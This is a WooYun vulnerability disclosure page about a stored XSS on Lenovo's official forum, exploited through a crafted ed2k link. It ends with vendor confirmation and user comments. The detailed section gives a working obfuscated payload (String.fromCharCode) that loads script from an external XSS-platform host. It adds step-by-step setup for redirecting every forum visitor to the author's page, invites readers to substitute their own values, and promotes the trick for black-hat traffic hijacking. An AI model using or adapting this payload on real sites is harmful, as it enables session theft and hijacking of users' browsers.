当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066899

漏洞标题:联想官方论坛一处未修复的漏洞导致论坛被劫持

相关厂商:联想

漏洞作者: 泳少

提交时间:2014-07-01 21:26

修复时间:2014-08-15 21:28

公开时间:2014-08-15 21:28

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-01: 细节已通知厂商并且等待厂商处理中
2014-07-03: 厂商已经确认,细节仅向厂商公开
2014-07-13: 细节向核心白帽子及相关领域专家公开
2014-07-23: 细节向普通白帽子公开
2014-08-02: 细节向实习白帽子公开
2014-08-15: 细节向公众公开

简要描述:

。。。。。。。。。。。。。电驴的错!据说已经在黑产圈流传开了。可以进行黑帽SEO对网站带来更大的流量!

详细说明:

引用回我漏洞地址。。http://wooyun.org/bugs/wooyun-2014-058538
之前提及到ed2k://|file|test|'+alert(document.cookie)+'|test/这段代码。但是在圈子内流传了另一种奇葩方法。我的这段代码是这样的!

ed2k://|file|test|'+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,115,115,46,114,101,47,53,48,57,54,62,60,47,115,99,114,105,112,116,62))+'|test/" target="_blank">test ('+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,115,115,46,114,101,47,53,48,54,54,62,60,47,115,99,114,105,112,116,62))+' Bytes)</a><script language="javascript">$('ed2k_L0H').innerHTML=htmlspecialchars(unescape(decodeURIComponent('test')))+' ('+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,115,115,46,114,101,47,53,48,54,54,62,60,47,115,99,114,105,112,116,62))+' Bytes)';</script>

然后上述的数字是黑页地址加08XSS平台调用的一些东西。。http://1.yongshao.sinaapp.com/ys.html这个就是我黑页。。不算黑页吧、、、我们来打开08XSS平台

1.png

然后添加个

2.png

代码里面填写黑页地址。。。

self.location='http://1.yongshao.sinaapp.com/ys.htm

l添加成功后!然后在项目添加里找到你自己刚刚创建的名字哈

3.png

随后

4.png

把调用地址转换下编码。。利用该款工具

5.png

如图所示

6.png

然后把刚刚上面说的那一大串代码。。。自己把所有的数字改成你自己的这个就好了!

漏洞证明:

俺在论坛这个地方上。。。弄了个东西。。- -http://ideaclub.lenovo.com.cn/forum/forum.php?mod=forumdisplay&fid=65

8.png

打开就跳转了

9.jpg

直接跳转到我的指定黑页。。如果说搞黑帽的呢?对一些大论坛未修复这个的可以直接引流啊

修复方案:

你懂的把?

版权声明:转载请注明来源 泳少@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-03 18:02

厂商回复:

感谢您对联想信息安全工作的支持,我们会尽快修复漏洞

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-01 21:41 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    好牛逼、、前排占位

  2. 2014-07-01 22:00 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @疯狗 能加精吗?哈哈

  3. 2014-07-01 22:13 | Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)

    电驴?那应该就是那个xss咯

  4. 2014-07-01 22:35 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @Jumbo 哪个?

  5. 2014-07-03 11:50 | Yck ( 路人 | Rank:0 漏洞数:1 | 找个玩渗透网站的、教我玩渗透、我给他8位q...)

    占位!

  6. 2014-07-03 21:23 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @联想 有奖品么。。这么高端的思路!~

  7. 2014-08-10 21:03 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    目测是这个 WooYun: Discuz! X 储存型XSS (X1 ~ X3.1最新版)

  8. 2014-08-15 22:14 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    笑喷了